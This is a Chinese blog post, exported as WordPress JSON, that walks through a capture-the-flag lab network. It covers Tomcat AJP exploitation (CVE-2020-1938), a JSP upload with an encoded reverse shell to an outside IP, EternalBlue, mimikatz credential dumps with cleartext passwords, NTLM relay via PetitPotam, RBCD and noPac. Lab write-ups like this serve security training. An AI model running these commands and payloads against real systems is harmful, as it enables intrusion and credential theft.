{"id":963,"date":"2025-04-17T15:14:25","date_gmt":"2025-04-17T07:14:25","guid":{"rendered":"http:\/\/www.s1mh0.cn\/blog\/?p=963"},"modified":"2025-04-17T15:14:35","modified_gmt":"2025-04-17T07:14:35","slug":"cqyj_spoofing","status":"publish","type":"post","link":"https:\/\/www.s1mh0.cn\/blog\/index.php\/2025\/04\/17\/cqyj_spoofing\/","title":{"rendered":"\u6625\u79cb\u4e91\u5883-Spoofing"},"content":{"rendered":"

Spoofing<\/h2>\n

\u6d89\u53ca\u7684\u77e5\u8bc6\u70b9<\/p>\n

Tomcat\u6587\u4ef6\u8bfb\u53d6\u548c\u6587\u4ef6\u6267\u884c\uff08CVE-2020-1938\uff09\nMS17-010\nNTLM Relay\uff08\u5229\u7528 WebDAV + Petitpotam\uff0c\u65e0AD CS\uff09\nRBCD\nnoPac<\/code><\/pre>\n
flag1<\/h3>\n
\u626b\u5230\u4e2a\u540e\u53f0\uff0c\u4f46\u662f\u6ca1\u53d1\u73b0\u80fd\u5229\u7528\u7684\u529f\u80fd\u70b9<\/p>\n
start infoscan\n39.98.122.137:8080 open\n39.98.122.137:8009 open\n39.98.122.137:22 open\n[*] alive ports len is: 3\nstart vulscan\n[*] WebTitle http:\/\/39.98.122.137:8080 code:200 len:7091   title:\u540e\u53f0\u7ba1\u7406<\/code><\/pre>\n
\u626b\u76ee\u5f55\u53d1\u73b0\u662ftomcat\u6846\u67b6<\/p>\n
Target: http:\/\/39.98.122.137:8080\/\n\n[22:13:33] Starting:\n......\n[22:14:50] 200 -   17KB - \/docs\/\n[22:14:50] 302 -    0B  - \/docs  ->  \/docs\/\n[22:14:51] 200 -  132B  - \/download\/\n[22:14:52] 302 -    0B  - \/download  ->  \/download\/\n[22:14:56] 200 -    1KB - \/examples\/\n[22:14:56] 200 -  658B  - \/examples\/servlets\/servlet\/CookieExample\n[22:14:56] 200 -    6KB - \/examples\/servlets\/index.html\n[22:14:56] 200 -  947B  - \/examples\/servlets\/servlet\/RequestHeaderExample\n[22:14:56] 200 -  682B  - \/examples\/jsp\/snp\/snoop.jsp\n[22:14:56] 302 -    0B  - \/examples  ->  \/examples\/\n[22:14:56] 200 -    1KB - \/examples\/websocket\/index.xhtml\n[22:14:56] 200 -   14KB - \/examples\/jsp\/index.html\n[22:15:07] 403 -    3KB - \/host-manager\/html\n[22:15:07] 403 -    3KB - \/host-manager\/\n[22:15:08] 302 -    0B  - \/images  ->  \/images\/\n[22:15:10] 200 -    7KB - \/index.html\n[22:15:18] 302 -    0B  - \/lib  ->  \/lib\/\n[22:15:24] 302 -    0B  - \/manager  ->  \/manager\/\n[22:15:24] 403 -    3KB - \/manager\/\n[22:15:24] 403 -    3KB - \/manager\/admin.asp\n[22:15:24] 403 -    3KB - \/manager\/html\n......\n\nTask Completed<\/code><\/pre>\n
Tomcat\u6587\u4ef6\u8bfb\u53d6<\/h4>\n
\u7248\u672c\u662f9.0.30\uff0c\u53ef\u4ee5\u6253CVE-2020-1938<\/p>\n
http:\/\/39.98.122.137:8080\/docs\/<\/code><\/pre>\n
\"spoofing1\"<\/p>\n
\"spoofing2\"<\/p>\n
ajp\u7aef\u53e3\u9ed8\u8ba4\u57288009\uff0c\u7528\u5de5\u5177<\/a>\u7684\u6587\u4ef6\u8bfb\u53d6\u529f\u80fd\u8bfb\u4e00\u4e0b\u8def\u7531<\/p>\n
python3 ajpShooter.py http:\/\/39.98.122.137:8080 8009 \/WEB-INF\/web.xml read<\/code><\/pre>\n
<!DOCTYPE web-app PUBLIC\n "-\/\/Sun Microsystems, Inc.\/\/DTD Web Application 2.3\/\/EN"\n "http:\/\/java.sun.com\/dtd\/web-app_2_3.dtd" >\n\n<web-app>\n  <display-name>Archetype Created Web Application<\/display-name>\n\n  <security-constraint>\n    <display-name>Tomcat Server Configuration Security Constraint<\/display-name>\n    <web-resource-collection>\n      <web-resource-name>Protected Area<\/web-resource-name>\n      <url-pattern>\/upload\/*<\/url-pattern>\n    <\/web-resource-collection>\n    <auth-constraint>\n      <role-name>admin<\/role-name>\n    <\/auth-constraint>\n  <\/security-constraint>\n    ......\n  <servlet>\n    <display-name>UploadTestServlet<\/display-name>\n    <servlet-name>UploadTestServlet<\/servlet-name>\n    <servlet-class>com.example.UploadTestServlet<\/servlet-class>\n  <\/servlet>\n  <servlet-mapping>\n    <servlet-name>UploadTestServlet<\/servlet-name>\n    <url-pattern>\/UploadServlet<\/url-pattern>\n  <\/servlet-mapping>\n\n  <servlet>\n    <display-name>DownloadFileServlet<\/display-name>\n    <servlet-name>DownloadFileServlet<\/servlet-name>\n    <servlet-class>com.example.DownloadFileServlet<\/servlet-class>\n  <\/servlet>\n  <servlet-mapping>\n    <servlet-name>DownloadFileServlet<\/servlet-name>\n    <url-pattern>\/DownloadServlet<\/url-pattern>\n  <\/servlet-mapping>\n<\/web-app><\/code><\/pre>\n
Tomcat\u6587\u4ef6\u4e0a\u4f20<\/h4>\n
\u53d1\u73b0\/UploadServlet<\/code>\u8def\u7531\u80fd\u4e0a\u4f20\u6587\u4ef6\uff0c\u5e76\u4e14\u4e0a\u4f20\u4e4b\u540e\u4f1a\u663e\u793a\u6587\u4ef6\u540d<\/p>\n
<%\n    java.io.InputStream in = Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC84LjEzOC44OS4yMzYvMTAwODcgMD4mMQ==}|{base64,-d}|{bash,-i}").getInputStream();\n    int a = -1;\n    byte[] b = new byte[2048];\n    out.print("<pre>");\n    while((a=in.read(b))!=-1){\n        out.println(new String(b));\n    }\n    out.print("<\/pre>");\n%><\/code><\/pre>\n
\"spoofing3\"<\/p>\n
Tomcat\u6587\u4ef6\u6267\u884c<\/h4>\n
\u7ee7\u7eed\u5229\u7528\u5de5\u5177\u7684\u6267\u884c\u529f\u80fd\u53cd\u5f39shell<\/p>\n
python3 ajpShooter.py http:\/\/39.98.122.137:8080\/ 8009 \/upload\/b2dca2aa65269c73810c167c59dff99f\/20250314101814795.txt eval<\/code><\/pre>\n
\"spoofing4\"<\/p>\n
root\u6743\u9650\uff0c\u76f4\u63a5\u62ff\u7b2c\u4e00\u4e2aflag<\/p>\n
\"spoofing5\"<\/p>\n
flag{bdead37b-81c5-4b75-be55-fa89d0762359}<\/code><\/pre>\n
flag2<\/h3>\n
\u4f20fscan\uff0cgost<\/p>\n
start infoscan\n(icmp) Target 172.22.11.76    is alive\n(icmp) Target 172.22.11.26    is alive\n(icmp) Target 172.22.11.45    is alive\n(icmp) Target 172.22.11.6     is alive\n[*] Icmp alive hosts len is: 4\n172.22.11.76:8080 open\n172.22.11.6:445 open\n172.22.11.45:445 open\n172.22.11.26:445 open\n172.22.11.45:139 open\n172.22.11.26:139 open\n172.22.11.6:135 open\n172.22.11.45:135 open\n172.22.11.26:135 open\n172.22.11.76:22 open\n172.22.11.6:139 open\n172.22.11.6:88 open\n172.22.11.76:8009 open\n[*] alive ports len is: 13\nstart vulscan\n[*] NetBios 172.22.11.26    XIAORANG\\XR-LCM3AE8B          \n[+] MS17-010 172.22.11.45       (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)\n[*] NetInfo \n[*]172.22.11.6\n   [->]XIAORANG-DC\n   [->]172.22.11.6\n[*] NetInfo \n[*]172.22.11.26\n   [->]XR-LCM3AE8B\n   [->]172.22.11.26\n[*] NetBios 172.22.11.6     [+] DC:XIAORANG\\XIAORANG-DC    \n[*] NetBios 172.22.11.45    XR-DESKTOP.xiaorang.lab             Windows Server 2008 R2 Enterprise 7601 Service Pack 1\n[*] WebTitle http:\/\/172.22.11.76:8080  code:200 len:7091   title:\u540e\u53f0\u7ba1\u7406\n\u5df2\u5b8c\u6210 13\/13\n[*] \u626b\u63cf\u7ed3\u675f,\u8017\u65f6: 7.551042085s<\/code><\/pre>\n
\u6c38\u6052\u4e4b\u84dd<\/h4>\n
\u626b\u5230172.22.11.45<\/code>\u7684\u4e3b\u673a\u53ef\u4ee5\u6253\u6c38\u6052\u4e4b\u84dd<\/p>\n
proxychains4 msfconsole\nuse exploit\/windows\/smb\/ms17_010_eternalblue\nset payload windows\/x64\/meterpreter\/bind_tcp_uuid\nset RHOSTS 172.22.11.45\nexploit<\/code><\/pre>\n
msf\u4e0a\u7ebf\u4e4b\u540e\uff0c\u62ff\u7b2c\u4e8c\u4e2alfag<\/p>\n
cat C:\\\\Users\\\\Administrator\\\\flag\\\\flag02.txt<\/code><\/pre>\n
\"spoofing6\"<\/p>\n
flag{24269f13-b3d3-4e2d-897f-19a519bcf4bb}<\/code><\/pre>\n
flag3<\/h3>\n
\u63a5\u7740\u5bfc\u4e00\u4e0b\u672c\u5730\u51ed\u636e<\/p>\n
hashdump\n\nAdministrator:500:aad3b435b51404eeaad3b435b51404ee:48f6da83eb89a4da8a1cc963b855a799:::\nGuest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::<\/code><\/pre>\n
\u518d\u5bfc\u4e00\u4e0b\u57df\u5185\u51ed\u636e<\/p>\n
load kiwi\ncreds_all\n\nUsername     Domain    NTLM                              SHA1\n--------     ------    ----                              ----\nXR-DESKTOP$  XIAORANG  6c69bbd5d575fa6f5b4d3eee58f9b669  bd917020823f914ddaec3fbfa2c6fb8c791abc45\nyangmei      XIAORANG  25e42ef4cc0ab6a8ff9e3edbbda91841  6b2838f81b57faed5d860adaf9401b0edb269a6f\n\nwdigest credentials\n===================\n......\nyangmei      XIAORANG  xrihGHgoNZQ\n\nkerberos credentials\n====================\n......\nxr-desktop$  XIAORANG.LAB  (null)\nyangmei      XIAORANG.LAB  xrihGHgoNZQ<\/code><\/pre>\n
\u56e0\u4e3ayangmei\u662f\u57df\u5185\u7528\u6237\uff0c\u53ef\u4ee5\u987a\u4fbf\u7ed9\u4ed6\u52a0\u5230\u7ba1\u7406\u5458\u7ec4<\/p>\n
proxychains4 impacket-smbexec -hashes :48f6da83eb89a4da8a1cc963b855a799 administrator@172.22.11.45 -codec gbk\n\nnet localgroup administrators yangmei \/add<\/code><\/pre>\n
\u7136\u540erdp\u767b\u5f55yangmei\u7528\u6237\u540e\u7528sharphound\u6536\u96c6\u4e00\u4e0b\u57df\u4fe1\u606f<\/p>\n
yangmei@xiaorang.lab\/xrihGHgoNZQ<\/code><\/pre>\n
\"spoofing7\"<\/p>\n
\u4e0d\u8fc7bloodhound\u770b\u4e0d\u51fa\u4ec0\u4e48\u4e1c\u897f<\/p>\n
NTLM Relay\uff08\u5229\u7528 WebDAV + Petitpotam\uff09<\/h4>\n
\u7ed3\u5408\u9776\u573a\u6807\u7b7e\u7ed9\u7684 NTLM \u548c WebClient\uff0c\u5e94\u8be5\u5c31\u662f\u901a\u8fc7 WebDav \u6253 NTLM-Relay<\/p>\n
\u5148\u4e86\u89e3\u4e0b NTLM-Relay \u653b\u51fb\u539f\u7406<\/p>\n
    \n
  1. \u8ba4\u8bc1\u6d41\u7a0b\u622a\u53d6<\/strong>
    \nNTLM\u534f\u8bae\u91c7\u7528\u6311\u6218-\u54cd\u5e94\u673a\u5236\uff0c\u653b\u51fb\u8005\u4f5c\u4e3a\u4e2d\u95f4\u4eba\u622a\u83b7\u5ba2\u6237\u7aef\u4e0e\u670d\u52a1\u7aef\u7684NTLM\u8ba4\u8bc1\u62a5\u6587\u3002\u5177\u4f53\u6b65\u9aa4\u5305\u62ec\uff1a
    \n\u2022 \u62e6\u622a\u8bf7\u6c42<\/strong>\uff1a\u653b\u51fb\u8005\u901a\u8fc7ARP\u6b3a\u9a97\u3001LLMNR\/NBNS\u6295\u6bd2\u6216\u5229\u7528\u6f0f\u6d1e\uff08\u5982\u6253\u5370\u673a\u670d\u52a1SpoolService\u3001PetitPotam\uff09\u5f3a\u5236\u76ee\u6807\u4e3b\u673a\u5411\u653b\u51fb\u8005\u53d1\u8d77NTLM\u8ba4\u8bc1\u8bf7\u6c42\u3002
    \n\u2022 \u8f6c\u53d1\u6311\u6218<\/strong>\uff1a\u653b\u51fb\u8005\u5c06\u670d\u52a1\u7aef\u8fd4\u56de\u7684\u6311\u6218\uff08Challenge\uff09\u8f6c\u53d1\u7ed9\u5ba2\u6237\u7aef\u3002
    \n\u2022 \u91cd\u653e\u54cd\u5e94<\/strong>\uff1a\u5ba2\u6237\u7aef\u4f7f\u7528\u5176NTLM\u51ed\u636e\u52a0\u5bc6\u6311\u6218\u751f\u6210\u54cd\u5e94\uff08Response\uff09\uff0c\u653b\u51fb\u8005\u5c06\u6b64\u54cd\u5e94\u91cd\u653e\u5230\u53e6\u4e00\u76ee\u6807\u670d\u52a1\uff08\u5982SMB\u3001LDAP\uff09\u4ee5\u901a\u8fc7\u8ba4\u8bc1\u3002<\/li>\n
  2. \u7ed5\u8fc7\u8ba4\u8bc1\u673a\u5236<\/strong>
    \n\u7531\u4e8eNTLM\u65e9\u671f\u7248\u672c\u672a\u9a8c\u8bc1\u8bf7\u6c42\u6765\u6e90\uff0c\u653b\u51fb\u8005\u53ef\u8de8\u534f\u8bae\u4e2d\u7ee7\uff08\u5982HTTP\u5230SMB\uff09\uff0c\u5229\u7528\u76ee\u6807\u670d\u52a1\u672a\u542f\u7528\u4f1a\u8bdd\u7b7e\u540d\u7684\u7279\u6027\uff0c\u4ee5\u53d7\u5bb3\u8005\u8eab\u4efd\u6267\u884c\u6076\u610f\u64cd\u4f5c\uff08\u5982\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u3001\u6743\u9650\u63d0\u5347\uff09\u3002<\/li>\n<\/ol>\n
    \u63a5\u7740\u518d\u4e86\u89e3\u4e00\u4e0b WebDav + PetitPotam \u7ec4\u5408\u5229\u7528\u6253\u6cd5\u8fc7\u7a0b\uff1a<\/p>\n
      \n
    • \u7b80\u5355\u6765\u8bf4\u5c31\u662f\u4f7f\u7528PetitPotam\u5de5\u5177\u5f3a\u5236\u57df\u63a7\u5411\u653b\u51fb\u673a\u53d1\u8d77NTLM\u8ba4\u8bc1\u8bf7\u6c42\uff0c\u7136\u540e\u901a\u8fc7\u5de5\u5177\uff08\u5982Impacket\u7684ntlmrelayx.py<\/code>\uff09\u5c06\u622a\u83b7\u7684\u8ba4\u8bc1\u6d41\u91cf\u4e2d\u7ee7\u81f3\u652f\u6301WebDav\u7684\u670d\u52a1\u5668\u3002\u7531\u4e8eWebDav\u4e0d\u9a8c\u8bc1\u7b7e\u540d\uff0c\u653b\u51fb\u8005\u53ef\u5192\u5145\u57df\u63a7\u8eab\u4efd\u8bbf\u95ee\u8be5\u670d\u52a1\uff0c\u5e76\u8fdb\u4e00\u6b65\u5229\u7528\u57fa\u4e8e\u8d44\u6e90\u7684\u7ea6\u675f\u59d4\u6d3e\uff08RBCD\uff09<\/li>\n<\/ul>\n
      \u5f00\u59cb\u5229\u7528\uff0c\u5148\u626b\u4e00\u4e0b WebClient \u548c PetitPotam<\/p>\n
      proxychains4 -q crackmapexec smb 172.22.11.0\/24 -u yangmei -p xrihGHgoNZQ -M webdav\nproxychains4 -q crackmapexec smb 172.22.11.0\/24 -u yangmei -p xrihGHgoNZQ -M petitpotam<\/code><\/pre>\n
      \u53d1\u73b0172.22.11.26<\/code>\u8fd9\u53f0\u673a\u5b58\u5728 WebClient \u670d\u52a1\uff0c\u4e5f\u80fd\u5229\u7528 PetitPotam\uff08\u9700\u8981\u4e24\u8005\u517c\u5907\uff09<\/p>\n
      \"spoofing8\"<\/p>\n
      \u540e\u7eed\u6253\u6cd5\u5c31\u662f\u8ddf\u7740\u5e08\u5085\u4eec\u7684\u535a\u5ba2\u590d\u73b0\u4e86\uff08\u4e5f\u6709\u81ea\u5df1\u7684\u7406\u89e3<\/p>\n
      \u8bd5\u4e86\u4e0b\u5165\u53e3\u673assh\u4e0d\u80fd\u7528\u5bc6\u7801\u8ba4\u8bc1\uff0c\u6240\u4ee5\u5148\u672c\u5730kali\u751f\u6210rsa\u5bc6\u94a5\u5bf9\uff0c\u7136\u540e\u628a\u516c\u94a5\u5199\u5230\u5165\u53e3\u673a<\/p>\n
      kali\uff1a\nssh-keygen -t rsa -b 4096\n\n\u5165\u53e3\u673a\uff1a\necho "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQC4xjtDHuEUFbLInjmqTntyTd8RSp24NDvWYpVCOHbNe\/vHJcpzOZhlycRJMZPRvOlA\/QuP63P8c93x+JXotYp7OWw3AoSFy3pMGhsOu0QxVMph3hlTGyyEyY6LZAFkeDEJOEbo82Q3HNXxgPiPzQgTFDCb2aYRJrjIUTy8GQwZiX6dOSit2Ju2XEzXNBEQi9NZT14H7Halane5lBb2NpzC+DUuxdvH512E3EUA0zO6x2Xz2+L\/IkQ7c+NyeaPuoWEgBXwkk6+SFqVsPpZjUq6qKhs3UHoz2EPjVRy9kQFCPCcej3afAcKhPqamz2snIsCuqORUKWusYUjKfebS280SFSvk5kqg\/cgheeUgHIyNVFpojzVi011oFA\/uZVBFr9qlVBi0b6ZB5\/iJ60gVX4BdccxRp1JQZnP\/CkjDnMMBgIbTd\/tDcbjMcvbIItrLasyvcnsWQUIMJKHiyQy2QiWmBXnkqc2HUWA\/VnyNCLg9x16v1HdV556Drj9udab\/pD6Bmu1+x9d+dmD4dvmtS4mVBPEyNDFguUKgc04qbaQfxhl4jtymouFxK7TI1J79ixBIMhIOhZmqI193Ac4AmV9UAg96+pI5dMfdJ8SA\/EunuPlL2Xg\/oqvA\/pc9fR8WenTHHVatVkC2hKeRQIuVeeTTf03x6PALHbjku8edeBrIrw== root@kali" >> \/root\/.ssh\/authorized_keys<\/code><\/pre>\n
      \u56e0\u4e3a\u662f\u5728\u672c\u5730kali\u865a\u62df\u673a\u8fdb\u884cNTLM-Relay \u653b\u51fb\uff0c\u56e0\u6b64\u9700\u8981\u5c06\u9776\u673a\u768480\u7aef\u53e3\u6d41\u91cf\u8f6c\u53d1\u5230\u672c\u5730kali\u768480\u7aef\u53e3\uff08-D\u53c2\u6570\u5b9e\u9645\u4e0d\u9700\u8981\uff09<\/p>\n
      \/\/ ssh\u516c\u94a5\u767b\u5f55\u9776\u673a\uff0c\u5e76\u5728\u9776\u673a\u76d1\u542c79\u7aef\u53e3\uff0c\u5c06\u6d41\u91cf\u8f6c\u53d1\u5230\u672c\u5730kali80\u7aef\u53e3\nssh -i ~\/.ssh\/id_rsa root@39.98.122.137 -R \\*:79:127.0.0.1:80\n\n\/\/ \u5728\u9776\u673a\u672c\u5730\u5efa\u7acb\u4ee3\u7406\uff0c\u76d1\u542c80\u7aef\u53e3\uff0c\u5c06\u6d41\u91cf\u8f6c\u53d1\u523079\u7aef\u53e3\nroot@ubuntu:~# nohup socat TCP-LISTEN:80,fork,bind=0.0.0.0 TCP:localhost:79 &<\/code><\/pre>\n
      \u603b\u4f53\u6548\u679c\u5c31\u662f\u5c06\u9776\u673a80\u7aef\u53e3\u6d41\u91cf\u7ecf\u8fc779\u7aef\u53e3\u4e2d\u8f6c\uff0c\u8f6c\u53d1\u5230\u672c\u5730kali\u768480\u7aef\u53e3<\/p>\n
      \"spoofing9\"<\/p>\n
      \u6d4b\u8bd5\u4e00\u4e0b\uff0ckali\u76d1\u542c80\u7aef\u53e3\uff0c\u8bbf\u95ee\u5165\u53e3\u673a80\u7aef\u53e3\uff0c\u76d1\u542c\u6536\u5230\u8bf7\u6c42<\/p>\n
      proxychains4 -q curl http:\/\/172.22.11.76:80<\/code><\/pre>\n
      \"spoofing10\"<\/p>\n
      \u63a5\u7740 ntlmrelayx \u76d1\u542c\u8ba4\u8bc1\u8bf7\u6c42\uff0c\u5229\u7528 PetitPotam \u8ba9172.22.11.26<\/code>\u673a\u5668\u4f7f\u7528 WebClient \u5411 ntlmrelayx \u53d1\u8d77NTLM\u8ba4\u8bc1\u8bf7\u6c42\uff0c\u7136\u540e ntlmrelayx \u518d\u5c06\u622a\u83b7\u7684\u8ba4\u8bc1\u6d41\u91cf\u4e2d\u7ee7\u81f3DC\u7684 LDAP \u670d\u52a1\uff0c\u4ece\u800c\u4fee\u6539xr-desktop$<\/code>\u673a\u5668\u8d26\u6237\u7684msDS-AllowedToActOnBehalfOfOtherIdentity\uff0c\u8ba4\u8bc1\u540e\u5c31\u53ef\u4ee5\u5229\u7528xr-desktop$<\/code>\u8d26\u6237\u6253172.22.11.26<\/code>\u7684RBCD<\/p>\n
      proxychains4 -q python3 ntlmrelayx.py -t ldap:\/\/172.22.11.6 --no-dump --no-da --no-acl --escalate-user 'xr-desktop$' --delegate-access\nproxychains4 -q python3 PetitPotam.py -u yangmei -p 'xrihGHgoNZQ' -d xiaorang.lab ubuntu@80\/pwn.txt 172.22.11.26<\/code><\/pre>\n
      \"spoofing11\"<\/p>\n
      RBCD<\/h4>\n
      \u4ee5 xr-desktop$<\/code> \u7684\u8eab\u4efd\u8bf7\u6c42 Administrator<\/code> \u7528\u6237\u7684 Kerberos \u670d\u52a1\u7968\u636e\uff08TGS\uff09<\/p>\n
      proxychains4 -q impacket-getST xiaorang.lab\/XR-Desktop\\$  -hashes :6c69bbd5d575fa6f5b4d3eee58f9b669 -dc-ip 172.22.11.6 -spn cifs\/XR-LCM3AE8B.xiaorang.lab -impersonate administrator<\/code><\/pre>\n
      \"spoofing12\"<\/p>\n
      \u8bbe\u7f6e Kerberos \u7968\u636e\u7f13\u5b58\uff0c\u5229\u7528\u7968\u636e\u6a2a\u5411\u79fb\u52a8\u5230\u57df\u63a7\uff0c\u62ff\u7b2c\u4e09\u4e2aflag<\/p>\n
      export KRB5CCNAME=administrator.ccache\nproxychains4 -q impacket-psexec 'xiaorang.lab\/administrator@XR-LCM3AE8B.xiaorang.lab' -target-ip 172.22.11.26 -codec gbk -no-pass -k<\/code><\/pre>\n
      \"spoofing13\"<\/p>\n
      flag{404f72c4-e21e-41b5-b1d7-491c75c96709}<\/code><\/pre>\n
      flag4<\/h3>\n
      \u52a0\u4e2a\u7ba1\u7406\u5458\u8d26\u6237\u4e0a\u4f20mimikatz\uff0c\u7136\u540esystem\u6743\u9650\u6293\u5bc6\u7801\uff0c\u80fd\u6293\u5230zhuanghui<\/code>\u7528\u6237\u7684\u54c8\u5e0c<\/p>\n
      mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" > 1.txt<\/code><\/pre>\n
      \"spoofing14\"<\/p>\n
      NoPac<\/h4>\n
      \u7528adfind\u53ef\u4ee5\u770b\u5230zhanghui<\/code>\u5728MA_Admin\u7ec4\uff0cMA_Admin\u7ec4\u80fd\u591f\u521b\u5efa\u7528\u6237\u8d26\u6237\uff08\u4f46\u662f\u81ea\u5df1\u4f20adfind\u8dd1\u4e0d\u51fa\u6765\uff09<\/p>\n
      AdFind.exe -b "CN=Computers,DC=xiaorang,DC=lab" nTSecurityDescriptor -sddl+++ > 2.txt<\/code><\/pre>\n
      \u6700\u540e\u901a\u8fc7 nopac \u4f7f\u7528 zhanghui<\/code> \u7684NTLM\u6a21\u62df Administrator<\/code> \u7528\u6237\uff0c\u521b\u5efa\u5b50\u5bf9\u8c61\uff0c\u901a\u8fc7 LDAP \u4e0eDC\u901a\u4fe1\u5e76\u5f00\u542fshell\u4ea4\u4e92<\/p>\n
      proxychains4 -q python3 noPac.py xiaorang.lab\/zhanghui -hashes ':1232126b24cdf8c9bd2f788a9d7c7ed1' -dc-ip 172.22.11.6 --impersonate Administrator -create-child -use-ldap -shell<\/code><\/pre>\n
      type C:\\Users\\Administrator\\flag\\flag04.txt<\/code><\/pre>\n
      \"spoofing15\"<\/p>\n
      flag{7511c580-c6ba-4e65-99cf-8ea30cf5bf0a}<\/code><\/pre>\n
      <\/div>","protected":false},"excerpt":{"rendered":"
      Spoofing \u6d89\u53ca\u7684\u77e5\u8bc6\u70b9 Tomcat\u6587\u4ef6\u8bfb\u53d6\u548c\u6587\u4ef6\u6267\u884c\uff08CVE-2020-1938\uff09 MS17-010 […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-963","post","type-post","status-publish","format-standard","hentry","category-pentesting"],"views":910,"_links":{"self":[{"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/posts\/963","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/comments?post=963"}],"version-history":[{"count":1,"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/posts\/963\/revisions"}],"predecessor-version":[{"id":964,"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/posts\/963\/revisions\/964"}],"wp:attachment":[{"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/media?parent=963"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/categories?post=963"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/tags?post=963"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}